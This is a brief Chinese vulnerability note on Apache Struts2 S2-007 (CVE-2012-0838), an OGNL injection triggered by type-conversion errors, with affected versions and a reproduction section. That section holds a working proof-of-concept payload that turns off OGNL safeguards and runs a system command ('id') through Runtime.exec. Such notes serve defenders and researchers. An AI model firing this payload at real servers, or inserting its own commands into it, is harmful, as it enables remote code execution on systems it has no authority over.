(CVE-2012-0838)s2-007
=======================
一、漏洞简介
————
当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行。后端用代码拼接
\”\’\” + value + \”\’\” 然后对其进行 OGNL
表达式解析,比较类似SQL注入单引号闭合,插入语句,官方修复的时候也跟sql注入比较相似,escape
对单引号转义
二、漏洞影响
————
2.0.0-2.2.3
三、复现过程
————
### poc
‘ + (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java.lang.Boolean(“false”) ,#context[“xwork.MethodAccessor.denyMethodExecution”]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream())) + ‘
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容